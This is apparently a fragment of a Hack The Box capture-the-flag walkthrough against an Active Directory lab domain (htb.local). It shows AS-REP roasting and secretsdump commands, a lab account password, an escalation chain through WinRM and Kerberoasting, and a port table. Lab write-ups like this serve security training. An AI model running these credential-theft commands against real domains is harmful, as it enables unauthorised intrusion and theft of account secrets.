impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request -usersfile users.txt
impacket-secretsdump -just-dc htb.local/svc-alfresco:s3rvice@10.10.10.161
The presence of WinRM (port 5985) is crucial. If we obtain credentials for a user in the "Remote Management Users" group, we can log in via evil-winrm.
Anonymous enumeration
↓
LDAP / RPC user list
↓
AS-REP Roasting → svc-alfresco creds
↓
WinRM access → User flag
↓
SeMachineAccountPrivilege + GenericWrite
↓
Add machine account → Set SPN on Admin → Kerberoast
↓
Crack Admin hash → WinRM as Administrator → Root flag
| Port | Service | State | Observation |
|------|---------|-------|--------------|
| 53 | DNS | Open | Domain: htb.local |
| 88 | Kerberos | Open | Key Distribution Center |
| 135 | MSRPC | Open | |
| 139/445 | SMB | Open | NetBIOS |
| 389 | LDAP | Open | Anonymous bind allowed? |
| 5985 | WinRM | Open | |
| 9389 | .NET Remoting | Open | |